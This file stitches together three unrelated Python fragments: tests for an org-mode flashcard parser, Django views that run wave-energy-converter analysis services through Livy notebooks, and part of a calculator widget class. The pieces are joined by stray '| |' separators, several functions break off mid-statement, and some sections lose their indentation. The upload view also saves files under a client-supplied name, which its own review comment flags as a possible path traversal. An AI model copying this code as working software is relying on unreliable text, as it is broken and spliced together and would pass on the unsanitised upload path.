    assert(question1.getAnswers()[1] == "Contains same codebase and does not store any user related data")
    question2 = actualDeck.getQuestions()[1]
    assert(question2.getQuestions()[0] == "Systems design primer\nWhere should sessions be stored?")
    assert(question2.getAnswers()[0] == "Centralized data store accessible to servers")
    question3 = actualDeck.getQuestions()[2]
    assert(question3.getQuestions()[0] == "Programming design patterns (online version)\nWhat is the main purpose of the factory pattern? (2)")
    assert(question3.getAnswers()[0] == "To allow object creation without exposing the creation logic to client")
    assert(question3.getAnswers()[1] == "Allow reference to objects via an interface")
def testParseCodeInBackQuotes():
    # Code fences in the org file carry both the language tag and the raw
    # code lines (inner indentation preserved).
    filename = "tests/testData/codeQuestion.org"
    actualDeck = parseData.parse(filename)
    questions = actualDeck.getQuestions()
    assert(questions[0].getCodeLanguage() == "python")
    assert(questions[0].getCodeSection() == ["print(\"hello world\")"])
    assert(questions[1].getCodeLanguage() == "python")
    assert(questions[1].getCodeSection() == ["if (this):", " print(\"worked\")"])
def testParseCodeIsFormatted():
    # Code answers are rendered to syntax-highlighted HTML; the expected
    # strings below pin the exact markup (pygments-style inline CSS —
    # brittle by design, they must change if the highlighter changes).
    filename = "tests/testData/codeQuestion.org"
    actualDeck = parseData.parse(filename)
    questions = actualDeck.getQuestions()
    print(questions[0].getAnswers()[1])
    assert(questions[0].getAnswers()[1] == """<div style="text-align:left"> <div class="highlight" style="background: #ffffff"><pre style="line-height: 125%"><span></span><span style="color: #008800; font-weight: bold">print</span>(<span style="background-color: #fff0f0">"hello world"</span>)<br></pre></div> </div>""")
    assert(questions[1].getAnswers()[0] == """<div style="text-align:left"> <div class="highlight" style="background: #ffffff"><pre style="line-height: 125%"><span></span><span style="color: #008800; font-weight: bold">if</span> (this):<br> <span style="color: #008800; font-weight: bold">print</span>(<span style="background-color: #fff0f0">"worked"</span>)<br></pre></div> </div>""")
def testEmptyLinesAreIgnored():
    # Headings with no text ("* ", "** ") are dropped entirely.
    data = ["* ","** ","* order list","** Answer"]
    deck = parseData._buildDeck(data, "test.org")
    assert(len(deck.getQuestions()) == 1)
    assert(deck.getQuestions()[0].getQuestions() == ["order list"])
    assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
def testStrangeOrgData():
    # org-mode bookkeeping (checkbox counters, LOGBOOK/CLOCK drawers, notes
    # sections) must be skipped without generating questions.
    data = ["* Planner [0/0]", "** Planner [/]", "#type=notes","** Something",":LOGBOOK:","CLOCK: [2019-04-19 Fri 14:27]--[2019-04-19 Fri 14:27] => 0:00", ":END:","* order list","** Answer"]
    deck = parseData._buildDeck(data, "test.org")
    assert(len(deck.getQuestions()) == 1)
    assert(deck.getQuestions()[0].getQuestions() == ["order list"])
    assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
def testParsingExtraFieldLinesWithMultipleFields():
    # '#fieldName=X' comments start a named field; extra 'key=value' pairs
    # on the same line must not break parsing.
    data = ["* Question", "** Answer", "#fieldName=Front hint, x=y", "** front hint","#fieldName=Back hint", "** back hint"]
    deck = parseData._buildDeck(data, "test.org")
    assert(len(deck.getQuestions()) == 1)
    assert(deck.getQuestions()[0].getQuestions() == ["Question"])
    assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
    namedFields = deck.getQuestions()[0].getNamedFields()
    # NOTE(review): this only checks non-emptiness; 'len(namedFields) == 2'
    # would be stricter.
    assert(len(namedFields))
    # No guarantee of ordering
    if namedFields[0].getFieldName() == "Front hint":
        a, b = 0, 1
    else:
        a, b = 1, 0
    assert(namedFields[a].getFieldName() == "Front hint")
    assert(namedFields[a].getLines() == ["front hint"])
    assert(namedFields[b].getFieldName() == "Back hint")
    assert(namedFields[b].getLines() == ["back hint"])
def testParsingExtraFieldLinesForMultipleQuestions():
    # Named fields attach only to the question they follow; the next
    # question starts clean.
    data = ["* Qusetion 1", "** Answer 1", "#fieldName=Front", "** front hint","* Question 2", "** Answer 2"]
    deck = parseData._buildDeck(data, "test.org")
    assert(len(deck.getQuestions()) == 2)
    assert(len(deck.getQuestions()[1].getNamedFields()) == 0)
def testParsingUnicodeCharacters():
    # Non-ASCII content must survive the file-reading path end to end.
    # data = ['* Hello world in Chinese?', '** 你好']
    # deck = parseData._buildDeck(data, "test.org")
    filename = "tests/testData/unicode.org"
    actualDeck = parseData.parse(filename)
    print(actualDeck.getQuestions()[0])
    question = actualDeck.getQuestions()[0]
    assert(question.getQuestions()[0] == "Hello world in Chinese?")
    assert(question.getAnswers()[0] == "你好")
def testOrgFormattingIsParsedWithoutError():
    """Checkbox lists, LOGBOOK drawers and indented comments parse without raising."""
    lines = ['* Planning', ' # type = notes', '** Time planner', ' :LOGBOOK:', ' CLOCK: [2019-04-15 Mon 12:52]--[2019-04-15 Mon 13:17] => 0:25', ' :END:', '** Sections', ' 1. [X] l1', ' 13. [ ] l10?']
    built = parseData._buildDeck(lines, "test.org")
    # Smoke test: any truthy deck object means parsing succeeded.
    assert built
def testSectionAreConvertedIntoDecksIndependnatlyForOrganisedFile():
    """With fileType=organisedFile, each top-level section is parsed on its own:
    the 'Planning' notes section must not bleed into the 'L1 Intro' questions."""
    data = ['# fileType=organisedFile ', '* Planning', ' # type = notes', '** Time planner', '* L1 Intro', '** What are the 3 main motivations for malware?', '*** money', '*** hacktivism', '*** nation state', '** What is an APT?', '*** Advanced persistent threat']
    actualDeck = parseData._buildDeck(data, "test.org")
    # First question comes from the L1 Intro section, not the Planning notes.
    assert(len(actualDeck.getQuestions()[0].getQuestions()) == 1)
    assert(actualDeck.getQuestions()[0].getQuestions()[0] == "What are the 3 main motivations for malware?")
    # The file-level parameter is recorded on the question.
    assert(actualDeck.getQuestions()[0]._parameters == {'fileType': 'organisedFile'})
def testTopicsDeckHasEachSectionParsedIndependently():
    """Each sub-deck of a topics-layout file keeps its own comments/parameters;
    type overrides in one section must not leak into the next.

    Fix: removed the unused locals `params` and `comments`, which were defined
    but never referenced by any assertion.
    """
    filename = "tests/testData/topicsLayout1.org"
    actualDeck = parseData.parse(filename)
    assert(len(actualDeck.subDecks) == 2)
    # First sub-deck carries no section-level comments or parameters.
    assert(actualDeck.subDecks[0]._comments == [])
    assert(actualDeck.subDecks[0]._parameters == {})
    # Second sub-deck: first question overrides the type, second keeps the default.
    assert(actualDeck.subDecks[1].getQuestions()[0]._comments == ['# type = basic', '#type=Basic (and reversed card)'])
    assert(actualDeck.subDecks[1].getQuestions()[0]._parameters == {'type': 'Basic (and reversed card)'})
    assert(actualDeck.subDecks[1].getQuestions()[1]._comments == ['# type = basic'])
    assert(actualDeck.subDecks[1].getQuestions()[1]._parameters == {'type': 'basic'})
def testParsingClozeQuestions():
    """Cloze-type cards are recognised, may omit an answer, and the Cloze type
    does not stick to later non-cloze questions."""
    filename = "tests/testData/cloze.org"
    actualDeck = parseData.parse(filename)
    assert(len(actualDeck.getQuestions()) == 4)
    assert(actualDeck.getQuestions()[0].getQuestions() == ["When was Dublin founded {{c1::1204}}"])
    assert(actualDeck.getQuestions()[0].getAnswers() == ["Some extra info"])
    assert(actualDeck.getQuestions()[0].getParameter("type") == "Cloze")
    # Check can form Cloze card without answer
    assert(actualDeck.getQuestions()[1].getQuestions() == ["When was Dublin founded {{c1::1204}}"])
    assert(actualDeck.getQuestions()[1].getAnswers() == [])
    # Check that the 4th question is not affected by previous cloze types
    assert(actualDeck.getQuestions()[3].getQuestions() == ["Normal Question"])
def testSectionLevelClozeCardsAreIgnored():
    """File-level cardType/type=Cloze comments must not attach to ordinary cards.

    Fix: compare against None with `is None` (PEP 8) instead of `== None`.
    """
    data = ['# cardType=Cloze', '#type=Cloze', '* Question 1', '** Answer 1']
    actualDeck = parseData._buildDeck(data, "test.org")
    assert(actualDeck.getQuestions()[0].getParameter("cardType") is None)
    assert(actualDeck.getQuestions()[0].getParameter("type") is None)
def testDeckWithTagsData():
    """A deck-level '# tags=' comment is split on commas and applied to cards."""
    lines = ['# tags=a,b,c', '* Question 1', '** Answer 1']
    built = parseData._buildDeck(lines, "test.org")
    first_card = built.getQuestions()[0]
    assert first_card.getTags() == ['a', 'b', 'c']
def testCardsWithTagsData():
    """A '# tags=' comment inside a card applies to that card."""
    lines = ['* Question 1', '# tags=a,b,c', '** Answer 1']
    built = parseData._buildDeck(lines, "test.org")
    first_card = built.getQuestions()[0]
    assert first_card.getTags() == ['a', 'b', 'c']
def testCardWithImageUrl_CommandLineMode():
    """An [image=URL] answer line causes the image to be fetched and attached
    as media.

    NOTE(review): this test performs a live HTTP download and asserts the exact
    byte count of the remote image, so it is network-dependent and will break
    if the hosted image changes -- consider a local fixture.
    """
    data = ["* Question", "** Image below", "** [image=https://lh3.googleusercontent.com/gdEMfGtrSRTvbTiXwysYJ_5XxqieWt0Z9vtFw0jQxOlbjo43_PJYa4kCusZjmkbe_euwGa4KAWEo2xJvEzHkwIpVN3H-XvCxVXCpQNOcH9_tERcVodYf75t18hYlargfKgYtHYvM]"]
    actualDeck = parseData._buildDeck(data, "test.org")
    # print(len(actualDeck.getQuestions()[0].getMedia()[0].data))
    assert(len(actualDeck.getQuestions()[0].getMedia()[0].data) == 68035)
def testCardWithImageUrl_CommandLineMode_imageInQuestion_bug():
    """Regression test: an [image=URL] inside the *question* line is replaced
    with an <img> tag whose src is the hash-named downloaded file, never the
    raw URL itself.

    NOTE(review): like its sibling test this downloads the image live and pins
    the exact byte count -- network-dependent.
    """
    data = ["* Question [image=https://lh3.googleusercontent.com/gdEMfGtrSRTvbTiXwysYJ_5XxqieWt0Z9vtFw0jQxOlbjo43_PJYa4kCusZjmkbe_euwGa4KAWEo2xJvEzHkwIpVN3H-XvCxVXCpQNOcH9_tERcVodYf75t18hYlargfKgYtHYvM]", "** Answer"]
    actualDeck = parseData._buildDeck(data, "test.org")
    # Assert that the url is not used
    # hash of url is used instead
    assert(actualDeck.getQuestions()[0].getQuestions()[0] == 'Question <img src="downloaded_image_8c9773be01c71c9b07bcad50cd83dd1b" />')
    assert(len(actualDeck.getQuestions()[0].getMedia()[0].data) == 68035)
    # TODO assert url points to a file and not to the url
def testUrlIsNotUsedForName():
data = | |
GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Converters in a Single Location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_area_evaluation_execute(request):
    """Start the WEC area-evaluation service and return the new instance id.

    Creates the ServiceInstance row, then hands the actual work to a
    background thread so the HTTP response returns immediately; the client
    polls for status using the returned id.
    """
    service = Service.objects.get(pk=settings.WEC_AREA_EVALUATION_SERVICE_ID)
    check_access(request, service)
    execution = ServiceInstance(service=service, user=request.user, time=datetime.now(),
                                status="starting service", dataframe_visualizations=[])
    execution.save()
    # Heavy lifting happens off-request.
    worker = Thread(target=wec_area_evaluation_execution_process, args=(request, execution.id))
    worker.start()
    return JsonResponse({'exec_instance': execution.id})
def wec_area_evaluation_execution_process(request, exec_instance):
    """Background worker for the WEC area-evaluation service.

    Gathers arguments from the request, clones the service notebook, registers
    the three map visualisations, runs the service code (through Livy when the
    service is configured for it) and records the final status on the
    ServiceInstance row.

    request -- originating Django request; GET parameters are read here
    exec_instance -- primary key of the ServiceInstance created by the caller
    """
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    service = Service.objects.get(pk=service_exec.service_id)
    # GATHER THE SERVICE ARGUMENTS
    service_args = ["latitude_from", "latitude_to", "longitude_from", "longitude_to", "start_date", "end_date"]
    args_to_note = gather_service_args(service_args, request, service_exec)
    args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
    converters_selection = request.GET.getlist("converters[]")
    wecs = list()
    for converter_id in converters_selection:
        aWec = dict()
        converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
        aWec['name'] = converter.title
        # Operating envelope of the converter, rounded to whole units
        # (strings because they are serialised into the notebook arguments).
        aWec['min_H'] = str(int(round(converter.min_height, 0)))
        aWec['max_H'] = str(int(round(converter.max_height)))
        aWec['min_T'] = str(int(round(converter.min_energy_period)))
        aWec['max_T'] = str(int(round(converter.max_energy_period)))
        aWec['wec_matrix'] = converter.sample_rows
        wecs.append(aWec)
    args_to_note['wecs'] = wecs
    # args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
    args_to_note['dataset_id'] = request.GET['dataset_id']
    # args_to_note['start_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageBegin)
    # args_to_note['end_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageEnd)
    service_exec.arguments = args_to_note
    service_exec.save()
    # CONFIGURE THE QUERY TO BE USED
    # dataset_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY.keys()[0]
    dataset_id = request.GET['dataset_id']
    query_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
    # NOTE(review): wave_height_query_id is never read below -- presumably
    # get_query_with_updated_filters is called for its side effects; confirm.
    wave_height_query_id = get_query_with_updated_filters(request, query_id)
    # CLONE THE SERVICE NOTE
    new_notebook_id = clone_service_note(request, service, service_exec)
    # ADD THE VISUALISATIONS TO BE CREATED
    visualisations = dict()
    power_cols_str = ''
    cap_factors_cols_str = ''
    shut_down_cols_str = ''
    # One contour layer per selected converter, appended to each viz URL.
    for i, converter_id in enumerate(converters_selection):
        converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
        power_cols_str += '&contour_var0=power for ' + str(converter.title) + '&contour_var_unit0=kW/m'
        cap_factors_cols_str += '&contour_var0=capacity factor for ' + str(converter.title) + '&contour_var_unit0=%'
        shut_down_cols_str += '&contour_var0=danger times for ' + str(converter.title) + '&contour_var_unit0=hours'
    visualisations['v1'] = ({'notebook_id': new_notebook_id,
                             'df': 'power_df',
                             'query': '',
                             'title': "WEC Average Power Output",
                             'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df&notebook_id0=" + str(new_notebook_id) + power_cols_str,
                             'done': False})
    visualisations['v2'] = ({'notebook_id': new_notebook_id,
                             'df': 'wec_cap_factors_df',
                             'query': '',
                             'title': "WEC Capacity Factor",
                             'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=wec_cap_factors_df&notebook_id0=" + str(new_notebook_id) + cap_factors_cols_str,
                             'done': False})
    visualisations['v3'] = ({'notebook_id': new_notebook_id,
                             'df': 'danger_times_df',
                             'query': '',
                             'title': "Number of Shut Down Hours",
                             'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=danger_times_df&notebook_id0=" + str(new_notebook_id) + shut_down_cols_str,
                             'done': False})
    service_exec.dataframe_visualizations = visualisations
    service_exec.save()
    # CREATE NEW ARGUMENTS PARAGRAPH
    new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
    # CREATE A LIVY SESSION
    if service.through_livy:
        service_exec.status = "Initializing Spark Session"
        service_exec.save()
        service_exec.livy_session = create_service_livy_session(request, service_exec)
        service_exec.save()
    try:
        # RUN THE SERVICE CODE
        execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_AREA_EVALUATION_SERVICE_PARAGRAPHS)
        service_exec.status = "done"
        service_exec.save()
        # Best-effort usage statistics; failures here must not fail the run.
        try:
            dataset_obj = Dataset.objects.get(id=int(dataset_id))
            service_obj = service_exec.service
            dataset_service_execution(dataset_obj, service_obj)
            service_use(service_obj)
            unique_service_use(service_obj, request.user)
            service_per_user(service_obj, request.user)
            nester_statistics(service_obj, dataset_obj)
        except:
            print 'Dataset or service does not exist'
        # Delete the cloned notebook after a 360s grace period (off-thread).
        t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 360))
        t.start()
    except Exception as e:
        print 'exception in livy execution'
        print '%s (%s)' % (e.message, type(e))
        service_exec.status = "failed"
        service_exec.save()
        # clean_up_new_note(service_exec.notebook_id)
    # Keep the Livy session alive only when the caller provided one explicitly.
    if 'livy_session' in request.GET.keys():
        pass
    else:
        if service_exec.service.through_livy:
            close_livy_session(service_exec.livy_session)
@never_cache
def wec_area_evaluation_results(request, exec_instance):
    """Render the results page for a finished WEC area-evaluation run.

    Pulls the 'result' dict out of the execution's Livy session and formats
    the study conditions (area, timeframe, dataset, converters) for display.
    """
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    # GET THE SERVICE RESULTS
    result = get_result_dict_from_livy(service_exec.livy_session, 'result')
    print 'result: ' + str(result)
    # clean_up_new_note(service_exec.notebook_id)
    dataset_id = str(result['dataset_id'])
    dataset_title = str(Dataset.objects.get(pk=dataset_id))
    latitude_from = str(result['latitude_from'])
    latitude_to = str(result['latitude_to'])
    longitude_from = str(result['longitude_from'])
    longitude_to = str(result['longitude_to'])
    start_date = str(result['start_date'])
    end_date = str(result['end_date'])
    converters = [str(name) for name in result['name']]
    # SHOW THE SERVICE OUTPUT PAGE
    return render(request, 'wave_energy_pilot/wec_area_assessment result.html',
                  {'result': result,
                   'back_url': '/wave-energy/energy_conversion/',
                   'service_title': 'Wave Energy - Performance of Wave Energy Converter in a Wide Area',
                   'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
                                        {'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
                                        {'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
                                        {'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
                   'no_viz': 'no_viz' in request.GET.keys(),
                   'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_generation_forecast_execute(request):
    """Start the WEC generation-forecast service and return the new instance id.

    Mirrors the other *_execute views: create the ServiceInstance, run the
    processing on a background thread, reply immediately with the id.
    """
    service = Service.objects.get(pk=settings.WEC_GENERATION_FORECAST_SERVICE_ID)
    check_access(request, service)
    execution = ServiceInstance(service=service, user=request.user, time=datetime.now(),
                                status="starting service", dataframe_visualizations=[])
    execution.save()
    # Heavy lifting happens off-request.
    worker = Thread(target=wec_generation_forecast_execution_process, args=(request, execution.id))
    worker.start()
    return JsonResponse({'exec_instance': execution.id})
def wec_generation_forecast_execution_process(request, exec_instance):
    """Background worker for the WEC generation-forecast service.

    Gathers arguments, clones the service notebook, registers the generated
    power line-chart visualisation, runs the service code and records the
    final status on the ServiceInstance row.

    request -- originating Django request; GET parameters are read here
    exec_instance -- primary key of the ServiceInstance created by the caller
    """
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    service = Service.objects.get(pk=service_exec.service_id)
    # GATHER THE SERVICE ARGUMENTS
    service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to"]
    args_to_note = gather_service_args(service_args, request, service_exec)
    args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET['dataset_id'])).table_name
    converters_selection = request.GET.getlist("converters[]")
    wecs = list()
    for converter_id in converters_selection:
        aWec = dict()
        converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
        aWec['name'] = converter.title
        # Operating envelope of the converter, rounded to whole units
        # (strings because they are serialised into the notebook arguments).
        aWec['min_H'] = str(int(round(converter.min_height, 0)))
        aWec['max_H'] = str(int(round(converter.max_height)))
        aWec['min_T'] = str(int(round(converter.min_energy_period)))
        aWec['max_T'] = str(int(round(converter.max_energy_period)))
        aWec['wec_matrix'] = converter.sample_rows
        wecs.append(aWec)
    args_to_note['wecs'] = wecs
    # args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
    args_to_note['dataset_id'] = request.GET['dataset_id']
    service_exec.arguments = args_to_note
    service_exec.save()
    # CONFIGURE THE QUERY TO BE USED
    # dataset_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
    dataset_id = request.GET['dataset_id']
    query_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
    # NOTE(review): wave_height_query_id is never read below -- presumably
    # get_query_with_updated_filters is called for its side effects; confirm.
    wave_height_query_id = get_query_with_updated_filters(request, query_id)
    # CLONE THE SERVICE NOTE
    new_notebook_id = clone_service_note(request, service, service_exec)
    # ADD THE VISUALISATIONS TO BE CREATED
    visualisations = dict()
    power_cols_str = ''
    unit_list_1 = ''
    # One y-series (in kW) per selected converter.
    for i, converter_id in enumerate(converters_selection):
        converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
        power_cols_str += '&y_var[]=power for ' + str(converter.title)
        unit_list_1 += 'kW,'
    # Drop the trailing comma from the unit list.
    unit_list_1 = unit_list_1[:-1]
    power_cols_str += '&y_var_unit=' + unit_list_1
    visualisations['v1'] = ({'notebook_id': new_notebook_id,
                             'df': 'power_df',
                             'query': '',
                             'title': "Generated Power",
                             'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df&notebook_id=" + str(
                                 new_notebook_id) + power_cols_str,
                             'done': False})
    service_exec.dataframe_visualizations = visualisations
    service_exec.save()
    # CREATE NEW ARGUMENTS PARAGRAPH
    new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
    # CREATE A LIVY SESSION
    if service.through_livy:
        service_exec.status = "Initializing Spark Session"
        service_exec.save()
        service_exec.livy_session = create_service_livy_session(request, service_exec)
        service_exec.save()
    try:
        # RUN THE SERVICE CODE
        # NOTE(review): this *forecast* service runs the
        # WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS setting -- every sibling
        # service uses its own *_SERVICE_PARAGRAPHS constant, so this looks
        # like a copy-paste slip; confirm against settings before changing.
        execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
        service_exec.status = "done"
        service_exec.save()
        # Best-effort usage statistics; failures here must not fail the run.
        try:
            dataset_obj = Dataset.objects.get(id=int(dataset_id))
            service_obj = service_exec.service
            dataset_service_execution(dataset_obj, service_obj)
            service_use(service_obj)
            unique_service_use(service_obj, request.user)
            service_per_user(service_obj, request.user)
            nester_statistics(service_obj, dataset_obj)
        except:
            print 'Dataset or service does not exist'
        # Delete the cloned notebook after a 180s grace period (off-thread).
        t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
        t.start()
    except Exception as e:
        print 'exception in livy execution'
        print '%s (%s)' % (e.message, type(e))
        service_exec.status = "failed"
        service_exec.save()
        # NOTE(review): unlike the area-evaluation worker (which leaves this
        # call commented out), the failure path here deletes the note
        # immediately and synchronously; confirm the inconsistency is intended.
        clean_up_new_note(service_exec.notebook_id)
    # Keep the Livy session alive only when the caller provided one explicitly.
    if 'livy_session' in request.GET.keys():
        pass
    else:
        if service_exec.service.through_livy:
            close_livy_session(service_exec.livy_session)
@never_cache
def wec_generation_forecast_results(request, exec_instance):
    """Render the results page for a finished WEC generation-forecast run.

    Pulls the 'result' dict out of the execution's Livy session and formats
    the study conditions (location, timeframe, dataset, converter) for display.
    Only the first converter name is shown -- the forecast runs one technology.
    """
    service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
    # GET THE SERVICE RESULTS
    result = get_result_dict_from_livy(service_exec.livy_session, 'result')
    print 'result: ' + str(result)
    # clean_up_new_note(service_exec.notebook_id)
    dataset_id = str(result['dataset_id'])
    dataset_title = str(Dataset.objects.get(pk=dataset_id))
    location_lat = str(result['location_lat'])
    location_lon = str(result['location_lon'])
    start_date = str(result['start_date'])
    end_date = str(result['end_date'])
    converter = str(result['name'][0])
    # SHOW THE SERVICE OUTPUT PAGE
    return render(request, 'wave_energy_pilot/wec_generation_forecast result.html',
                  {'result': result,
                   'back_url': '/wave-energy/energy_conversion/',
                   'service_title': 'Wave Energy - Wave Power Generation Forecast',
                   'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
                                        {'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
                                        {'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
                                        {'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
                   'no_viz': 'no_viz' in request.GET.keys(),
                   'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_load_matching_execute(request):
    """Start the WEC load-matching service and return the new instance id.

    Saves the uploaded 'load_profile_csv' to the static files area, then runs
    the processing on a background thread and replies immediately.

    Fix: the upload is now written inside a `with` block so the file handle is
    closed even if a chunk write raises (the original leaked the descriptor on
    error and never closed it before the worker thread might read the file).
    """
    service = Service.objects.get(pk=settings.WEC_LOAD_MATCHING_SERVICE_ID)
    check_access(request, service)
    service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
                                   status="starting service", dataframe_visualizations=[])
    service_exec.save()
    load_profile_csv = request.FILES['load_profile_csv']
    if not load_profile_csv.name.endswith('.csv'):
        return HttpResponse(status=500)
    # SECURITY NOTE(review): load_profile_csv.name is client-controlled; a name
    # containing path separators could escape this directory (path traversal).
    # The raw name is also consumed by the execution process, so sanitising it
    # must be coordinated there -- flagged rather than changed here.
    # Write the file to disk
    destination = 'wave_energy_pilot/static/wave_energy_pilot/files/load_matching/' + load_profile_csv.name
    with open(destination, 'wb') as fout:
        for chunk in load_profile_csv.chunks():
            fout.write(chunk)
    # Spawn thread to process the data
    t = Thread(target=wec_load_matching_execution_process, args=(request, service_exec.id))
    t.start()
    return JsonResponse({'exec_instance': service_exec.id})
def wec_load_matching_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
try:
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec, 'post')
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.POST['dataset_id'])).table_name
load_profile_csv = request.FILES['load_profile_csv'].name
args_to_note['load_profile_csv'] = load_profile_csv
converters_selection = request.POST.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.POST['dataset_id']
query_id | |
i:
self.frame.keypress(size, 'down')
nf, (ni, nsub) = self.walker.get_focus()
    def move_focus_prev(self, size):
        """Move focus to the previous cell above the current one.

        size -- (maxcol,) or (maxcol, maxrow) tuple passed through to keypress

        A cell can span several widget rows, so 'up' is pressed repeatedly
        until the walker reports a different cell index.  Requires that the
        focus is not already on the first cell (asserted).
        """
        f, (i, sub) = self.walker.get_focus()
        assert i>0
        ni = i
        while ni == i:
            self.frame.keypress(size, 'up')
            nf, (ni, nsub) = self.walker.get_focus()
    def update_results( self, start_from=None ):
        """Recompute cell results from a cell downward. Return True if the
        column's final result changed, False otherwise.

        start_from -- Cell to start updating from or None to start from
                      the current focus (default None)
        """
        if start_from is None:
            f, (i, sub) = self.walker.get_focus()
        else:
            i = self.content.index(start_from)
        # NOTE(review): list.index raises ValueError rather than returning
        # None, so this guard looks unreachable -- confirm before removing.
        if i == None: return False
        focus_cell = self.walker.get_cell(i)
        # Seed the running value x: the top cell supplies its own value,
        # any other cell applies its operator to the previous cell's result.
        if focus_cell.is_top:
            x = focus_cell.get_value()
            last_op = None  # NOTE(review): never read afterwards
        else:
            last_cell = self.walker.get_cell(i-1)
